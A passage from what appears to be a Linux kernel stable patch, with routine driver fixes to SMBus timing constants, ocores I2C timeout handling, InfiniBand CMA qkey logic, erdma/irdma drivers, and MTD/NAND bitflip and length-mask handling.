+  * SR_HOLD_TIME_XK_TICKS field will indicate the number of ticks of the
+  * baud clock required to program 'Hold Time' at X KHz.
+  */
+-#define SR_HOLD_TIME_100K_TICKS	133
+-#define SR_HOLD_TIME_400K_TICKS	20
+-#define SR_HOLD_TIME_1000K_TICKS	11
++#define SR_HOLD_TIME_100K_TICKS		150
++#define SR_HOLD_TIME_400K_TICKS		20
++#define SR_HOLD_TIME_1000K_TICKS	12
+ 
+ #define SMB_CORE_COMPLETION_REG_OFF3	(SMBUS_MAST_CORE_ADDR_BASE + 0x23)
+ 
+@@ -65,17 +65,17 @@
+  * the baud clock required to program 'fair idle delay' at X KHz. Fair idle
+  * delay establishes the MCTP T(IDLE_DELAY) period.
+  */
+-#define FAIR_BUS_IDLE_MIN_100K_TICKS		969
+-#define FAIR_BUS_IDLE_MIN_400K_TICKS		157
+-#define FAIR_BUS_IDLE_MIN_1000K_TICKS		157
++#define FAIR_BUS_IDLE_MIN_100K_TICKS		992
++#define FAIR_BUS_IDLE_MIN_400K_TICKS		500
++#define FAIR_BUS_IDLE_MIN_1000K_TICKS		500
+ 
+ /*
+  * FAIR_IDLE_DELAY_XK_TICKS field will indicate the number of ticks of the
+  * baud clock required to satisfy the fairness protocol at X KHz.
+  */
+-#define FAIR_IDLE_DELAY_100K_TICKS	1000
+-#define FAIR_IDLE_DELAY_400K_TICKS	500
+-#define FAIR_IDLE_DELAY_1000K_TICKS	500
++#define FAIR_IDLE_DELAY_100K_TICKS	963
++#define FAIR_IDLE_DELAY_400K_TICKS	156
++#define FAIR_IDLE_DELAY_1000K_TICKS	156
+ 
+ #define SMB_IDLE_SCALING_100K		\
+ 	((FAIR_IDLE_DELAY_100K_TICKS << 16) | FAIR_BUS_IDLE_MIN_100K_TICKS)
+@@ -105,7 +105,7 @@
+  */
+ #define BUS_CLK_100K_LOW_PERIOD_TICKS		156
+ #define BUS_CLK_400K_LOW_PERIOD_TICKS		41
+-#define BUS_CLK_1000K_LOW_PERIOD_TICKS	15
++#define BUS_CLK_1000K_LOW_PERIOD_TICKS		15
+ 
+ /*
+  * BUS_CLK_XK_HIGH_PERIOD_TICKS field defines the number of I2C Baud Clock
+@@ -131,7 +131,7 @@
+  */
+ #define CLK_SYNC_100K			4
+ #define CLK_SYNC_400K			4
+-#define CLK_SYNC_1000K		4
++#define CLK_SYNC_1000K			4
+ 
+ #define SMB_CORE_DATA_TIMING_REG_OFF	(SMBUS_MAST_CORE_ADDR_BASE + 0x40)
+ 
+@@ -142,25 +142,25 @@
+  * determines the SCLK hold time following SDAT driven low during the first
+  * START bit in a transfer.
+  */
+-#define FIRST_START_HOLD_100K_TICKS	22
+-#define FIRST_START_HOLD_400K_TICKS	16
+-#define FIRST_START_HOLD_1000K_TICKS	6
++#define FIRST_START_HOLD_100K_TICKS	23
++#define FIRST_START_HOLD_400K_TICKS	8
++#define FIRST_START_HOLD_1000K_TICKS	12
+ 
+ /*
+  * STOP_SETUP_XK_TICKS will indicate the number of ticks of the baud clock
+  * required to program 'STOP_SETUP' timer at X KHz. This timer determines the
+  * SDAT setup time from the rising edge of SCLK for a STOP condition.
+  */
+-#define STOP_SETUP_100K_TICKS		157
++#define STOP_SETUP_100K_TICKS		150
+ #define STOP_SETUP_400K_TICKS		20
+-#define STOP_SETUP_1000K_TICKS	12
++#define STOP_SETUP_1000K_TICKS		12
+ 
+ /*
+  * RESTART_SETUP_XK_TICKS will indicate the number of ticks of the baud clock
+  * required to program 'RESTART_SETUP' timer at X KHz. This timer determines the
+  * SDAT setup time from the rising edge of SCLK for a repeated START condition.
+  */
+-#define RESTART_SETUP_100K_TICKS	157
++#define RESTART_SETUP_100K_TICKS	156
+ #define RESTART_SETUP_400K_TICKS	20
+ #define RESTART_SETUP_1000K_TICKS	12
+ 
+@@ -169,7 +169,7 @@
+  * required to program 'DATA_HOLD' timer at X KHz. This timer determines the
+  * SDAT hold time following SCLK driven low.
+  */
+-#define DATA_HOLD_100K_TICKS		2
++#define DATA_HOLD_100K_TICKS		12
+ #define DATA_HOLD_400K_TICKS		2
+ #define DATA_HOLD_1000K_TICKS		2
+ 
+@@ -190,35 +190,35 @@
+  * Bus Idle Minimum time = BUS_IDLE_MIN[7:0] x Baud_Clock_Period x
+  * (BUS_IDLE_MIN_XK_TICKS[7] ? 4,1)
+  */
+-#define BUS_IDLE_MIN_100K_TICKS		167UL
+-#define BUS_IDLE_MIN_400K_TICKS		139UL
+-#define BUS_IDLE_MIN_1000K_TICKS		133UL
++#define BUS_IDLE_MIN_100K_TICKS		36UL
++#define BUS_IDLE_MIN_400K_TICKS		10UL
++#define BUS_IDLE_MIN_1000K_TICKS	4UL
+ 
+ /*
+  * CTRL_CUM_TIME_OUT_XK_TICKS defines SMBus Controller Cumulative Time-Out.
+  * SMBus Controller Cumulative Time-Out duration =
+  * CTRL_CUM_TIME_OUT_XK_TICKS[7:0] x Baud_Clock_Period x 2048
+  */
+-#define CTRL_CUM_TIME_OUT_100K_TICKS		159
+-#define CTRL_CUM_TIME_OUT_400K_TICKS		159
+-#define CTRL_CUM_TIME_OUT_1000K_TICKS		159
++#define CTRL_CUM_TIME_OUT_100K_TICKS		76
++#define CTRL_CUM_TIME_OUT_400K_TICKS		76
++#define CTRL_CUM_TIME_OUT_1000K_TICKS		76
+ 
+ /*
+  * TARGET_CUM_TIME_OUT_XK_TICKS defines SMBus Target Cumulative Time-Out duration.
+  * SMBus Target Cumulative Time-Out duration = TARGET_CUM_TIME_OUT_XK_TICKS[7:0] x
+  * Baud_Clock_Period x 4096
+  */
+-#define TARGET_CUM_TIME_OUT_100K_TICKS	199
+-#define TARGET_CUM_TIME_OUT_400K_TICKS	199
+-#define TARGET_CUM_TIME_OUT_1000K_TICKS	199
++#define TARGET_CUM_TIME_OUT_100K_TICKS	95
++#define TARGET_CUM_TIME_OUT_400K_TICKS	95
++#define TARGET_CUM_TIME_OUT_1000K_TICKS	95
+ 
+ /*
+  * CLOCK_HIGH_TIME_OUT_XK defines Clock High time out period.
+  * Clock High time out period = CLOCK_HIGH_TIME_OUT_XK[7:0] x Baud_Clock_Period x 8
+  */
+-#define CLOCK_HIGH_TIME_OUT_100K_TICKS	204
+-#define CLOCK_HIGH_TIME_OUT_400K_TICKS	204
+-#define CLOCK_HIGH_TIME_OUT_1000K_TICKS	204
++#define CLOCK_HIGH_TIME_OUT_100K_TICKS	97
++#define CLOCK_HIGH_TIME_OUT_400K_TICKS	97
++#define CLOCK_HIGH_TIME_OUT_1000K_TICKS	97
+ 
+ #define TO_SCALING_100K		\
+ 	((BUS_IDLE_MIN_100K_TICKS << 24) | (CTRL_CUM_TIME_OUT_100K_TICKS << 16) | \
+diff --git a/drivers/i2c/busses/i2c-ocores.c b/drivers/i2c/busses/i2c-ocores.c
+index a0af027db04c1..2e575856c5cd5 100644
+--- a/drivers/i2c/busses/i2c-ocores.c
++++ b/drivers/i2c/busses/i2c-ocores.c
+@@ -342,18 +342,18 @@ static int ocores_poll_wait(struct ocores_i2c *i2c)
+  * ocores_isr(), we just add our polling code around it.
+  *
+  * It can run in atomic context
++ *
++ * Return: 0 on success, -ETIMEDOUT on timeout
+  */
+-static void ocores_process_polling(struct ocores_i2c *i2c)
++static int ocores_process_polling(struct ocores_i2c *i2c)
+ {
+-	while (1) {
+-		irqreturn_t ret;
+-		int err;
++	irqreturn_t ret;
++	int err = 0;
+ 
++	while (1) {
+ 		err = ocores_poll_wait(i2c);
+-		if (err) {
+-			i2c->state = STATE_ERROR;
++		if (err)
+ 			break; /* timeout */
+-		}
+ 
+ 		ret = ocores_isr(-1, i2c);
+ 		if (ret == IRQ_NONE)
+@@ -364,13 +364,15 @@ static void ocores_process_polling(struct ocores_i2c *i2c)
+ 					break;
+ 		}
+ 	}
++
++	return err;
+ }
+ 
+ static int ocores_xfer_core(struct ocores_i2c *i2c,
+ 			    struct i2c_msg *msgs, int num,
+ 			    bool polling)
+ {
+-	int ret;
++	int ret = 0;
+ 	u8 ctrl;
+ 
+ 	ctrl = oc_getreg(i2c, OCI2C_CONTROL);
+@@ -388,15 +390,16 @@ static int ocores_xfer_core(struct ocores_i2c *i2c,
+ 	oc_setreg(i2c, OCI2C_CMD, OCI2C_CMD_START);
+ 
+ 	if (polling) {
+-		ocores_process_polling(i2c);
++		ret = ocores_process_polling(i2c);
+ 	} else {
+-		ret = wait_event_timeout(i2c->wait,
+-					 (i2c->state == STATE_ERROR) ||
+-					 (i2c->state == STATE_DONE), HZ);
+-		if (ret == 0) {
+-			ocores_process_timeout(i2c);
+-			return -ETIMEDOUT;
+-		}
++		if (wait_event_timeout(i2c->wait,
++				       (i2c->state == STATE_ERROR) ||
++				       (i2c->state == STATE_DONE), HZ) == 0)
++			ret = -ETIMEDOUT;
++	}
++	if (ret) {
++		ocores_process_timeout(i2c);
++		return ret;
+ 	}
+ 
+ 	return (i2c->state == STATE_DONE) ? num : -EIO;
+diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
+index 7e508b15e7761..00c9529c3143f 100644
+--- a/drivers/infiniband/core/cma.c
++++ b/drivers/infiniband/core/cma.c
+@@ -624,22 +624,11 @@ static inline unsigned short cma_family(struct rdma_id_private *id_priv)
+ 	return id_priv->id.route.addr.src_addr.ss_family;
+ }
+ 
+-static int cma_set_qkey(struct rdma_id_private *id_priv, u32 qkey)
++static int cma_set_default_qkey(struct rdma_id_private *id_priv)
+ {
+ 	struct ib_sa_mcmember_rec rec;
+ 	int ret = 0;
+ 
+-	if (id_priv->qkey) {
+-		if (qkey && id_priv->qkey != qkey)
+-			return -EINVAL;
+-		return 0;
+-	}
+-
+-	if (qkey) {
+-		id_priv->qkey = qkey;
+-		return 0;
+-	}
+-
+ 	switch (id_priv->id.ps) {
+ 	case RDMA_PS_UDP:
+ 	case RDMA_PS_IB:
+@@ -659,6 +648,16 @@ static int cma_set_qkey(struct rdma_id_private *id_priv, u32 qkey)
+ 	return ret;
+ }
+ 
++static int cma_set_qkey(struct rdma_id_private *id_priv, u32 qkey)
++{
++	if (!qkey ||
++	    (id_priv->qkey && (id_priv->qkey != qkey)))
++		return -EINVAL;
++
++	id_priv->qkey = qkey;
++	return 0;
++}
++
+ static void cma_translate_ib(struct sockaddr_ib *sib, struct rdma_dev_addr *dev_addr)
+ {
+ 	dev_addr->dev_type = ARPHRD_INFINIBAND;
+@@ -1229,7 +1228,7 @@ static int cma_ib_init_qp_attr(struct rdma_id_private *id_priv,
+ 	*qp_attr_mask = IB_QP_STATE | IB_QP_PKEY_INDEX | IB_QP_PORT;
+ 
+ 	if (id_priv->id.qp_type == IB_QPT_UD) {
+-		ret = cma_set_qkey(id_priv, 0);
++		ret = cma_set_default_qkey(id_priv);
+ 		if (ret)
+ 			return ret;
+ 
+@@ -4558,7 +4557,10 @@ static int cma_send_sidr_rep(struct rdma_id_private *id_priv,
+ 	memset(&rep, 0, sizeof rep);
+ 	rep.status = status;
+ 	if (status == IB_SIDR_SUCCESS) {
+-		ret = cma_set_qkey(id_priv, qkey);
++		if (qkey)
++			ret = cma_set_qkey(id_priv, qkey);
++		else
++			ret = cma_set_default_qkey(id_priv);
+ 		if (ret)
+ 			return ret;
+ 		rep.qp_num = id_priv->qp_num;
+@@ -4763,9 +4765,7 @@ static void cma_make_mc_event(int status, struct rdma_id_private *id_priv,
+ 	enum ib_gid_type gid_type;
+ 	struct net_device *ndev;
+ 
+-	if (!status)
+-		status = cma_set_qkey(id_priv, be32_to_cpu(multicast->rec.qkey));
+-	else
++	if (status)
+ 		pr_debug_ratelimited("RDMA CM: MULTICAST_ERROR: failed to join multicast. status %d\n",
+ 				     status);
+ 
+@@ -4793,7 +4793,7 @@ static void cma_make_mc_event(int status, struct rdma_id_private *id_priv,
+ 	}
+ 
+ 	event->param.ud.qp_num = 0xFFFFFF;
+-	event->param.ud.qkey = be32_to_cpu(multicast->rec.qkey);
++	event->param.ud.qkey = id_priv->qkey;
+ 
+ out:
+ 	if (ndev)
+@@ -4812,8 +4812,11 @@ static int cma_ib_mc_handler(int status, struct ib_sa_multicast *multicast)
+ 	    READ_ONCE(id_priv->state) == RDMA_CM_DESTROYING)
+ 		goto out;
+ 
+-	cma_make_mc_event(status, id_priv, multicast, &event, mc);
+-	ret = cma_cm_event_handler(id_priv, &event);
++	ret = cma_set_qkey(id_priv, be32_to_cpu(multicast->rec.qkey));
++	if (!ret) {
++		cma_make_mc_event(status, id_priv, multicast, &event, mc);
++		ret = cma_cm_event_handler(id_priv, &event);
++	}
+ 	rdma_destroy_ah_attr(&event.param.ud.ah_attr);
+ 	WARN_ON(ret);
+ 
+@@ -4866,9 +4869,11 @@ static int cma_join_ib_multicast(struct rdma_id_private *id_priv,
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = cma_set_qkey(id_priv, 0);
+-	if (ret)
+-		return ret;
++	if (!id_priv->qkey) {
++		ret = cma_set_default_qkey(id_priv);
++		if (ret)
++			return ret;
++	}
+ 
+ 	cma_set_mgid(id_priv, (struct sockaddr *) &mc->addr, &rec.mgid);
+ 	rec.qkey = cpu_to_be32(id_priv->qkey);
+@@ -4945,9 +4950,6 @@ static int cma_iboe_join_multicast(struct rdma_id_private *id_priv,
+ 	cma_iboe_set_mgid(addr, &ib.rec.mgid, gid_type);
+ 
+ 	ib.rec.pkey = cpu_to_be16(0xffff);
+-	if (id_priv->id.ps == RDMA_PS_UDP)
+-		ib.rec.qkey = cpu_to_be32(RDMA_UDP_QKEY);
+-
+ 	if (dev_addr->bound_dev_if)
+ 		ndev = dev_get_by_index(dev_addr->net, dev_addr->bound_dev_if);
+ 	if (!ndev)
+@@ -4973,6 +4975,9 @@ static int cma_iboe_join_multicast(struct rdma_id_private *id_priv,
+ 	if (err || !ib.rec.mtu)
+ 		return err ?: -EINVAL;
+ 
++	if (!id_priv->qkey)
++		cma_set_default_qkey(id_priv);
++
+ 	rdma_ip2gid((struct sockaddr *)&id_priv->id.route.addr.src_addr,
+ 		    &ib.rec.port_gid);
+ 	INIT_WORK(&mc->iboe_join.work, cma_iboe_join_work_handler);
+@@ -4998,6 +5003,9 @@ int rdma_join_multicast(struct rdma_cm_id *id, struct sockaddr *addr,
+ 			    READ_ONCE(id_priv->state) != RDMA_CM_ADDR_RESOLVED))
+ 		return -EINVAL;
+ 
++	if (id_priv->id.qp_type != IB_QPT_UD)
++		return -EINVAL;
++
+ 	mc = kzalloc(sizeof(*mc), GFP_KERNEL);
+ 	if (!mc)
+ 		return -ENOMEM;
+diff --git a/drivers/infiniband/core/verbs.c b/drivers/infiniband/core/verbs.c
+index 11b1c1603aeb4..b99b3cc283b65 100644
+--- a/drivers/infiniband/core/verbs.c
++++ b/drivers/infiniband/core/verbs.c
+@@ -532,6 +532,8 @@ static struct ib_ah *_rdma_create_ah(struct ib_pd *pd,
+ 	else
+ 		ret = device->ops.create_ah(ah, &init_attr, NULL);
+ 	if (ret) {
++		if (ah->sgid_attr)
++			rdma_put_gid_attr(ah->sgid_attr);
+ 		kfree(ah);
+ 		return ERR_PTR(ret);
+ 	}
+diff --git a/drivers/infiniband/hw/erdma/erdma_cq.c b/drivers/infiniband/hw/erdma/erdma_cq.c
+index cabd8678b3558..7bc354273d4ec 100644
+--- a/drivers/infiniband/hw/erdma/erdma_cq.c
++++ b/drivers/infiniband/hw/erdma/erdma_cq.c
+@@ -65,7 +65,7 @@ static const enum ib_wc_opcode wc_mapping_table[ERDMA_NUM_OPCODES] = {
+ 	[ERDMA_OP_LOCAL_INV] = IB_WC_LOCAL_INV,
+ 	[ERDMA_OP_READ_WITH_INV] = IB_WC_RDMA_READ,
+ 	[ERDMA_OP_ATOMIC_CAS] = IB_WC_COMP_SWAP,
+-	[ERDMA_OP_ATOMIC_FAD] = IB_WC_FETCH_ADD,
++	[ERDMA_OP_ATOMIC_FAA] = IB_WC_FETCH_ADD,
+ };
+ 
+ static const struct {
+diff --git a/drivers/infiniband/hw/erdma/erdma_hw.h b/drivers/infiniband/hw/erdma/erdma_hw.h
+index ab371fec610c3..8a8d4539a006b 100644
+--- a/drivers/infiniband/hw/erdma/erdma_hw.h
++++ b/drivers/infiniband/hw/erdma/erdma_hw.h
+@@ -441,7 +441,7 @@ struct erdma_reg_mr_sqe {
+ };
+ 
+ /* EQ related. */
+-#define ERDMA_DEFAULT_EQ_DEPTH 256
++#define ERDMA_DEFAULT_EQ_DEPTH 4096
+ 
+ /* ceqe */
+ #define ERDMA_CEQE_HDR_DB_MASK BIT_ULL(63)
+@@ -491,7 +491,7 @@ enum erdma_opcode {
+ 	ERDMA_OP_LOCAL_INV = 15,
+ 	ERDMA_OP_READ_WITH_INV = 16,
+ 	ERDMA_OP_ATOMIC_CAS = 17,
+-	ERDMA_OP_ATOMIC_FAD = 18,
++	ERDMA_OP_ATOMIC_FAA = 18,
+ 	ERDMA_NUM_OPCODES = 19,
+ 	ERDMA_OP_INVALID = ERDMA_NUM_OPCODES + 1
+ };
+diff --git a/drivers/infiniband/hw/erdma/erdma_main.c b/drivers/infiniband/hw/erdma/erdma_main.c
+index 5dc31e5df5cba..4a29a53a6652e 100644
+--- a/drivers/infiniband/hw/erdma/erdma_main.c
++++ b/drivers/infiniband/hw/erdma/erdma_main.c
+@@ -56,7 +56,7 @@ done:
+ static int erdma_enum_and_get_netdev(struct erdma_dev *dev)
+ {
+ 	struct net_device *netdev;
+-	int ret = -ENODEV;
++	int ret = -EPROBE_DEFER;
+ 
+ 	/* Already binded to a net_device, so we skip. */
+ 	if (dev->netdev)
+diff --git a/drivers/infiniband/hw/erdma/erdma_qp.c b/drivers/infiniband/hw/erdma/erdma_qp.c
+index d088d6bef431a..44923c51a01b4 100644
+--- a/drivers/infiniband/hw/erdma/erdma_qp.c
++++ b/drivers/infiniband/hw/erdma/erdma_qp.c
+@@ -405,7 +405,7 @@ static int erdma_push_one_sqe(struct erdma_qp *qp, u16 *pi,
+ 			FIELD_PREP(ERDMA_SQE_MR_MTT_CNT_MASK,
+ 				   mr->mem.mtt_nents);
+ 
+-		if (mr->mem.mtt_nents < ERDMA_MAX_INLINE_MTT_ENTRIES) {
++		if (mr->mem.mtt_nents <= ERDMA_MAX_INLINE_MTT_ENTRIES) {
+ 			attrs |= FIELD_PREP(ERDMA_SQE_MR_MTT_TYPE_MASK, 0);
+ 			/* Copy SGLs to SQE content to accelerate */
+ 			memcpy(get_queue_entry(qp->kern_qp.sq_buf, idx + 1,
+@@ -439,7 +439,7 @@ static int erdma_push_one_sqe(struct erdma_qp *qp, u16 *pi,
+ 				cpu_to_le64(atomic_wr(send_wr)->compare_add);
+ 		} else {
+ 			wqe_hdr |= FIELD_PREP(ERDMA_SQE_HDR_OPCODE_MASK,
+-					      ERDMA_OP_ATOMIC_FAD);
++					      ERDMA_OP_ATOMIC_FAA);
+ 			atomic_sqe->fetchadd_swap_data =
+ 				cpu_to_le64(atomic_wr(send_wr)->compare_add);
+ 		}
+diff --git a/drivers/infiniband/hw/erdma/erdma_verbs.h b/drivers/infiniband/hw/erdma/erdma_verbs.h
+index e0a993bc032a4..131cf5f409822 100644
+--- a/drivers/infiniband/hw/erdma/erdma_verbs.h
++++ b/drivers/infiniband/hw/erdma/erdma_verbs.h
+@@ -11,7 +11,7 @@
+ 
+ /* RDMA Capability. */
+ #define ERDMA_MAX_PD (128 * 1024)
+-#define ERDMA_MAX_SEND_WR 4096
++#define ERDMA_MAX_SEND_WR 8192
+ #define ERDMA_MAX_ORD 128
+ #define ERDMA_MAX_IRD 128
+ #define ERDMA_MAX_SGE_RD 1
+diff --git a/drivers/infiniband/hw/irdma/cm.c b/drivers/infiniband/hw/irdma/cm.c
+index 195aa9ea18b6c..8817864154af1 100644
+--- a/drivers/infiniband/hw/irdma/cm.c
++++ b/drivers/infiniband/hw/irdma/cm.c
+@@ -1458,13 +1458,15 @@ static int irdma_send_fin(struct irdma_cm_node *cm_node)
+  * irdma_find_listener - find a cm node listening on this addr-port pair
+  * @cm_core: cm's core
+  * @dst_addr: listener ip addr
++ * @ipv4: flag indicating IPv4 when true
+  * @dst_port: listener tcp port num
+  * @vlan_id: virtual LAN ID
+  * @listener_state: state to match with listen node's
+  */
+ static struct irdma_cm_listener *
+-irdma_find_listener(struct irdma_cm_core *cm_core, u32 *dst_addr, u16 dst_port,
+-		    u16 vlan_id, enum irdma_cm_listener_state listener_state)
++irdma_find_listener(struct irdma_cm_core *cm_core, u32 *dst_addr, bool ipv4,
++		    u16 dst_port, u16 vlan_id,
++		    enum irdma_cm_listener_state listener_state)
+ {
+ 	struct irdma_cm_listener *listen_node;
+ 	static const u32 ip_zero[4] = { 0, 0, 0, 0 };
+@@ -1477,7 +1479,7 @@ irdma_find_listener(struct irdma_cm_core *cm_core, u32 *dst_addr, u16 dst_port,
+ 	list_for_each_entry (listen_node, &cm_core->listen_list, list) {
+ 		memcpy(listen_addr, listen_node->loc_addr, sizeof(listen_addr));
+ 		listen_port = listen_node->loc_port;
+-		if (listen_port != dst_port ||
++		if (listen_node->ipv4 != ipv4 || listen_port != dst_port ||
+ 		    !(listener_state & listen_node->listener_state))
+ 			continue;
+ 		/* compare node pair, return node handle if a match */
+@@ -2902,9 +2904,10 @@ irdma_make_listen_node(struct irdma_cm_core *cm_core,
+ 	unsigned long flags;
+ 
+ 	/* cannot have multiple matching listeners */
+-	listener = irdma_find_listener(cm_core, cm_info->loc_addr,
+-				       cm_info->loc_port, cm_info->vlan_id,
+-				       IRDMA_CM_LISTENER_EITHER_STATE);
++	listener =
++		irdma_find_listener(cm_core, cm_info->loc_addr, cm_info->ipv4,
++				    cm_info->loc_port, cm_info->vlan_id,
++				    IRDMA_CM_LISTENER_EITHER_STATE);
+ 	if (listener &&
+ 	    listener->listener_state == IRDMA_CM_LISTENER_ACTIVE_STATE) {
+ 		refcount_dec(&listener->refcnt);
+@@ -3153,6 +3156,7 @@ void irdma_receive_ilq(struct irdma_sc_vsi *vsi, struct irdma_puda_buf *rbuf)
+ 
+ 		listener = irdma_find_listener(cm_core,
+ 					       cm_info.loc_addr,
++					       cm_info.ipv4,
+ 					       cm_info.loc_port,
+ 					       cm_info.vlan_id,
+ 					       IRDMA_CM_LISTENER_ACTIVE_STATE);
+diff --git a/drivers/infiniband/hw/irdma/cm.h b/drivers/infiniband/hw/irdma/cm.h
+index 19c284975fc7c..7feadb3e1eda3 100644
+--- a/drivers/infiniband/hw/irdma/cm.h
++++ b/drivers/infiniband/hw/irdma/cm.h
+@@ -41,7 +41,7 @@
+ #define TCP_OPTIONS_PADDING	3
+ 
+ #define IRDMA_DEFAULT_RETRYS	64
+-#define IRDMA_DEFAULT_RETRANS	8
++#define IRDMA_DEFAULT_RETRANS	32
+ #define IRDMA_DEFAULT_TTL		0x40
+ #define IRDMA_DEFAULT_RTT_VAR		6
+ #define IRDMA_DEFAULT_SS_THRESH		0x3fffffff
+diff --git a/drivers/infiniband/hw/irdma/hw.c b/drivers/infiniband/hw/irdma/hw.c
+index 2e1e2bad04011..43dfa4761f069 100644
+--- a/drivers/infiniband/hw/irdma/hw.c
++++ b/drivers/infiniband/hw/irdma/hw.c
+@@ -41,6 +41,7 @@ static enum irdma_hmc_rsrc_type iw_hmc_obj_types[] = {
+ 	IRDMA_HMC_IW_XFFL,
+ 	IRDMA_HMC_IW_Q1,
+ 	IRDMA_HMC_IW_Q1FL,
++	IRDMA_HMC_IW_PBLE,
+ 	IRDMA_HMC_IW_TIMER,
+ 	IRDMA_HMC_IW_FSIMC,
+ 	IRDMA_HMC_IW_FSIAV,
+@@ -827,6 +828,8 @@ static int irdma_create_hmc_objs(struct irdma_pci_f *rf, bool privileged,
+ 	info.entry_type = rf->sd_type;
+ 
+ 	for (i = 0; i < IW_HMC_OBJ_TYPE_NUM; i++) {
++		if (iw_hmc_obj_types[i] == IRDMA_HMC_IW_PBLE)
++			continue;
+ 		if (dev->hmc_info->hmc_obj[iw_hmc_obj_types[i]].cnt) {
+ 			info.rsrc_type = iw_hmc_obj_types[i];
+ 			info.count = dev->hmc_info->hmc_obj[info.rsrc_type].cnt;
+diff --git a/drivers/infiniband/hw/irdma/utils.c b/drivers/infiniband/hw/irdma/utils.c
+index 445e69e864097..7887230c867b1 100644
+--- a/drivers/infiniband/hw/irdma/utils.c
++++ b/drivers/infiniband/hw/irdma/utils.c
+@@ -2595,7 +2595,10 @@ void irdma_generate_flush_completions(struct irdma_qp *iwqp)
+ 			/* remove the SQ WR by moving SQ tail*/
+ 			IRDMA_RING_SET_TAIL(*sq_ring,
+ 				sq_ring->tail + qp->sq_wrtrk_array[sq_ring->tail].quanta);
+-
++			if (cmpl->cpi.op_type == IRDMAQP_OP_NOP) {
++				kfree(cmpl);
++				continue;
++			}
+ 			ibdev_dbg(iwqp->iwscq->ibcq.device,
+ 				  "DEV: %s: adding wr_id = 0x%llx SQ Completion to list qp_id=%d\n",
+ 				  __func__, cmpl->cpi.wr_id, qp->qp_id);
+diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c
+index c669ef6e47e73..eaa35e1df2a85 100644
+--- a/drivers/infiniband/hw/mlx5/main.c
++++ b/drivers/infiniband/hw/mlx5/main.c
+@@ -442,6 +442,10 @@ static int translate_eth_ext_proto_oper(u32 eth_proto_oper, u16 *active_speed,
+ 		*active_width = IB_WIDTH_2X;
+ 		*active_speed = IB_SPEED_NDR;
+ 		break;
++	case MLX5E_PROT_MASK(MLX5E_400GAUI_8):
++		*active_width = IB_WIDTH_8X;
++		*active_speed = IB_SPEED_HDR;
++		break;
+ 	case MLX5E_PROT_MASK(MLX5E_400GAUI_4_400GBASE_CR4_KR4):
+ 		*active_width = IB_WIDTH_4X;
+ 		*active_speed = IB_SPEED_NDR;
+diff --git a/drivers/mtd/mtdblock.c b/drivers/mtd/mtdblock.c
+index 1e94e7d10b8be..a0a1194dc1d90 100644
+--- a/drivers/mtd/mtdblock.c
++++ b/drivers/mtd/mtdblock.c
+@@ -153,7 +153,7 @@ static int do_cached_write (struct mtdblk_dev *mtdblk, unsigned long pos,
+ 				mtdblk->cache_state = STATE_EMPTY;
+ 				ret = mtd_read(mtd, sect_start, sect_size,
+ 					       &retlen, mtdblk->cache_data);
+-				if (ret)
++				if (ret && !mtd_is_bitflip(ret))
+ 					return ret;
+ 				if (retlen != sect_size)
+ 					return -EIO;
+@@ -188,8 +188,12 @@ static int do_cached_read (struct mtdblk_dev *mtdblk, unsigned long pos,
+ 	pr_debug("mtdblock: read on \"%s\" at 0x%lx, size 0x%x\n",
+ 			mtd->name, pos, len);
+ 
+-	if (!sect_size)
+-		return mtd_read(mtd, pos, len, &retlen, buf);
++	if (!sect_size) {
++		ret = mtd_read(mtd, pos, len, &retlen, buf);
++		if (ret && !mtd_is_bitflip(ret))
++			return ret;
++		return 0;
++	}
+ 
+ 	while (len > 0) {
+ 		unsigned long sect_start = (pos/sect_size)*sect_size;
+@@ -209,7 +213,7 @@ static int do_cached_read (struct mtdblk_dev *mtdblk, unsigned long pos,
+ 			memcpy (buf, mtdblk->cache_data + offset, size);
+ 		} else {
+ 			ret = mtd_read(mtd, pos, size, &retlen, buf);
+-			if (ret)
++			if (ret && !mtd_is_bitflip(ret))
+ 				return ret;
+ 			if (retlen != size)
+ 				return -EIO;
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index a28574c009003..074e14225c06a 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -280,7 +280,7 @@ static void meson_nfc_cmd_access(struct nand_chip *nand, int raw, bool dir,
+ 
+ 	if (raw) {
+ 		len = mtd->writesize + mtd->oobsize;
+-		cmd = (len & GENMASK(5, 0)) | scrambler | DMA_DIR(dir);
++		cmd = (len & GENMASK(13, 0)) | scrambler | DMA_DIR(dir);
+ 		writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 		return;
+ 	}
+@@ -544,7 +544,7 @@ static int meson_nfc_read_buf(struct nand_chip *nand, u8 *buf, int len)
+ 	if (ret)
+ 		goto out;
+ 
+-	cmd = NFC_CMD_N2M | (len & GENMASK(5, 0));
++	cmd = NFC_CMD_N2M | (len & GENMASK(13, 0));
+ 	writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 
+ 	meson_nfc_drain_cmd(nfc);
+@@ -568,7 +568,7 @@ static int meson_nfc_write_buf(struct nand_chip *nand, u8 *buf, int len)
+ 	if (ret)
+ 		return ret;
+ 
+-	cmd = NFC_CMD_M2N | (len & GENMASK(5, 0));
++	cmd = NFC_CMD_M2N | (len & GENMASK(13, 0));
+ 	writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 
+ 	meson_nfc_drain_cmd(nfc);
+diff --git a/drivers/mtd/nand/raw/stm32_fmc2_nand.c b/drivers/mtd/nand/raw/stm32_fmc2_nand.c
+index 5d627048c420d..9e74bcd90aaa2 100644
+--- a/drivers/mtd/nand/raw/stm32_fmc2_nand.c
++++ b/drivers/mtd/nand/raw/stm32_fmc2_nand.c
+@@ -1531,6 +1531,9 @@ static int stm32_fmc2_nfc_setup_interface(struct nand_chip *chip, int chipnr,
+ 	if (IS_ERR(sdrt))
+ 		return PTR_ERR(sdrt);
+ 
++	if (conf->timings.mode > 3)
++		return -EOPNOTSUPP;
++
+ 	if (chipnr == NAND_DATA_IFACE_CHECK_ONLY)
+ 		return 0;
+ 
+diff --git a/drivers/mtd/ubi/build.c b/drivers/mtd/ubi/build.c
+index 7f65af1697519..1662c12e24ada 100644
+--- a/drivers/mtd/ubi/build.c
++++ b/drivers/mtd/ubi/build.c
+@@ -664,12 +664,6 @@ static int io_init(struct ubi_device *ubi, int max_beb_per1024)
